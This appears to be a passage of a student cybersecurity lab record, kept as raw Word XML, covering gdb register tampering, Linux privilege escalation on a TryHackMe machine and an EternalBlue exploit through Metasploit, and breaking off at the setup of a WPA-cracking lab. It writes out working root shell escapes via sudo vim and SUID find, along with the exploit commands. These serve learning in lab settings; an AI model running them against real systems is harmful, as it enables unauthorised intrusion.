      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 1456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070731C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A0C92B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**Attaching to process 1456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6AD4C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0x00007f... in sleep () from /lib/x86_64-linux-gnu/libc.so.6**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071C9C2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855EDC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Inspecting registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390682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 registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9619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B2280A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**RAX: 0x0   RBX: 0x7ffd...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE5E7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RIP: 0x7f...   RSP: 0x7ffd...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6B906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RBP: 0x7ffd...**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528F21E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581438D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Modifying execution flow (conceptual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD46F9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 $rip = $rip + 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA8AA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F36712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**(no explicit output, instruction pointer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>modified)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0A7E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C556F7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Continuing process execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A193A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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A93CD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88FC42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**Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E658B1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Program resumed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>execution.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68952F7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E4BDB9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F337855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6" w:name="_4c5dkcppm5zo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="749C3E3A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="290C1FE6" w14:textId="44EF5F22" w:rsidR="00835F24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37" w:name="_srgv04x43spj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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RESULT: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The running process was successfully traced using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ptrace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-based tools such as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strace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gdb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Registers and execution flow were inspected and modified conceptually, demonstrating code injection techniques in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environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51307287" w14:textId="000B784E" w:rsidR="00F44251" w:rsidRPr="00835F24" w:rsidRDefault="00835F2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AA672D1" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/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091BDF8" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5312EA94" w14:textId="4BC36F29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8" w:name="_vu6uevoa07c4" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="38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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="17BE09FC" w14:textId="6DE32AB6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PRIVILEGE ESCALATION IN TRYHACKME PLATFORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="6A0B1930" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2231C07E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69B25CBD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A9CBCFC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BFC8F39" w14:textId="4FDFDAC1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perform privilege escalation on a Linux system using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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F675B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9" w:name="_361017s6bf6z" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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10FCEC6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205AC7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Connecting to target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB63FE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ssh tryhackme@10.10.152.45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE3F4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D8DA59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tryhackme@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>$**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E173B6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C4E76D8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Checking current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19321E8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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32CAD83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AD5C3B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**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3435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EFB28F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Checking user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460373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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3339D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A3F709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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>=1001(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) gid=1001(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) groups=1001(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)**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECEDECB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145E35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Checking system information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712F796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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550C3A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66F9AD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**Linux ubuntu 4.4.0-21-generic**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4293FF8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2BE943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5. Checking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sudo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permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448E85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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C05E35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8F0428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**User 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 xml:space="preserve"> may run the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433E89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(root) NOPASSWD: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/bin/vim**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766DC1C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BAF53C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6. Exploiting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sudo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privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E799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vim -c </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>':!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FCB1BC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63B657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Verifying root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB177B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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="264A019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02AF4F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**root**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0460A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FDA87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Searching for SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B358AE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/ -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101DD59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3980BB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/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B069A7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/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F998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/bin/python**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992680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0AE8C8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Exploiting SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635297D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find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72973FA2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1988842" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F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4E47469" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F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F711CB8" w14:textId="13B01363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10. Checking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cron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jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216783D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/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A273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0FEA3A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 * * * * root /home/user/script.sh**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D9D6A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70C7DF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Checking PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A2B0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$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961766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B07EC3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/local/bin:/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/bin:/bin**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FDC68F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7B7280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12. Running enumeration tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18866FD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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DCE9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D6B733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**Possible SUID files found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E30B2B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Writable files detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45023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Kernel vulnerability detected**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B734CB4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515262D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13. Confirming root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7B17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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C4F313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2520CE4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**root**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76970AF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B8D2311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1086FB9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56EEDCE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BA5CDC8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E50316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14. Capturing root flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658558B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 /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA871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40DE9F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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>THM{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root_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D60D7C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2D03D04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0" w:name="_d179ptke1exx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="79C19CAA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1" w:name="_os0k43bcbty0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="13A41A46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2" w:name="_3rz95pgnea0g" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="1990B44B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3" w:name="_fbfuje3r1mqx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5F6151F3" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="3391B3AA" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="77A6592C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="43B7D3B6" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7E41C827" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="3CA8749B" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="258E42A4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="5D9F495F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="42CE9967" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="0ADFE0BC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="49BD3761" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7B026F15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76C7995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078113D6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DE2AFE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C828BAD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37356190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15EC9294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FBFF34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1E40D5B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54E148DB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1B4C981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FA352CC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7AC3C64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5595B1E7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4BE27CAD" w14:textId="2B52C9DF" w:rsidR="00F44251" w:rsidRPr="005025F0" w:rsidRDefault="00000000">
      <w:pPr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Privilege escalation was successfully performed by exploiting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permissions, SUID binaries, and system misconfigurations, and root access was obtained.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5025F0" w14:paraId="5E544FEA" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7D4280E2" w14:textId="6ACB8B20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44" w:name="_5oxc6veg2xab" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="44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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="7B574739" w14:textId="50A2A36D" w:rsidR="005025F0" w:rsidRPr="000F4FFB" w:rsidRDefault="005025F0" w:rsidP="005025F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5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DEMONSTRATE VARIOUS EXPLOITS OF WINDOW OS USING METASPLOIT FRAMEWORK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005025F0" w14:paraId="0C68339B" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="638AA7BC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951CE6E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32694AD2" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F0" w:rsidP="005025F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905DEFD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exploit Windows OS vulnerabilities using Metasploit in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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014877D7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5" w:name="_lvx7nppimn6v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4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542A241C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6FB81811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Starting Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04803DF0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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46D4DA1B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6EC0274E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Metasploit v6.x loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0D1F2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2500+ exploits available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06731F70" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="0989BC18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Searching for exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401A53C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search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eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E2CB155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239BEF1C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exploit/windows/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smb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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030C7DC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exploit/windows/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smb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/ms17_010_psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A700FB9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="18180D04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Selecting exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB82000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46" w:name="_r735olgra3cn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use exploit/windows/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smb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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB0A021" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="51FBDCD7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Setting target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46540F8D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set RHOSTS 10.48.140.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E58032" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7C73CE2F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Setting local host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9E0FB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set LHOST 10.48.133.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8B30E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="49308E85" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025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29FA10EF" w14:textId="0A646983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6. Executing exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79685A11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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335435B0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409C6FFD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Host is likely VULNERABLE to MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C810896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Connection established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D334DDE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Sending exploit payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EFC4B" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7F617706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7. Meterpreter session obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592020B5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40939F96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Meterpreter session 1 opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E238B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7" w:name="_lwvv26vzpglx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="08867479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8" w:name="_nbhkc555aafl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="292F0BDE" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="0CE7092F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="16581922" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="4CC8E4A6" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="51F89017" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="47BCAFC0" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="2CAF3A15" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="59540F98" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="08E71D81" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="256384D4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="75EB7DDF" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6648D171" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="1297B897" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="619138D8" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="1B3E94F5" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="4AE5305A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="557CD31F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="30BC31B7" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="3ECC1112" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="35B7C657" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6640D989" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="60E6461E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7D1CD592" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="563A38B9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="336B4F7B" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESULT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">:  Thus, The Windows system was successfully exploited using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS17-010) vulnerability through the Metasploit Framework. A Meterpreter session was established, providing remote access and control over the target machine.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5025F0" w14:paraId="6887C01D" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="32592BCE" w14:textId="7403711A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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="21F253DB" w14:textId="471BE434" w:rsidR="005025F0" w:rsidRPr="005025F0" w:rsidRDefault="005025F0" w:rsidP="005025F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5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WIRELESS AUDIT ON ROUTERS AND DECRYPT THE WPA KEYS USING AIRCRACK-NG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005025F0" w14:paraId="5B50D7EF" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AE20448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0BCB1FA4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A89961F" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F0" w:rsidP="005025F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4705F31" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F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E59CEA5" w14:textId="2054132D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 xml:space="preserve">To perform wireless network analysis and security auditing using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>-ng tools in Kali Linux for educational and ethical hacking purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66596D4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0FC3094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SOFTWARE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REQUIREMENTS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846B3C4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 Operating System: Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B4609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Virtualization Software: Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6AAD53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 Operating System: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40880BC4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Security Tools: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>-ng Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E382409" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACB523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SYSTEM REQUIREMENTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D3BB4" w14:textId="77777777" w:rsidR="00F44251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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8845AD" w14:textId="77777777" w:rsidR="00F44251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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE5DD28" w14:textId="77777777" w:rsidR="00F44251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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062232C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="20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Wireless Adapter supporting Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC081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PROCEDURE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFED0D7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69E9F6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Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55D6FB" w14:textId="77777777" w:rsidR="00F44251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Launch Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E254D99" w14:textId="77777777" w:rsidR="00F44251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the Kali Linux virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281ECE82" w14:textId="77777777" w:rsidR="00F44251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 in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E528AB" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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</w:p>
    <w:p w14:paraId="325600F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Connect Wireless Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2870ADB9" w14:textId="77777777" w:rsidR="00F44251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Attach a wireless adapter that supports monitor mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C55473" w14:textId="77777777" w:rsidR="00F44251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Verify adapter using:   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
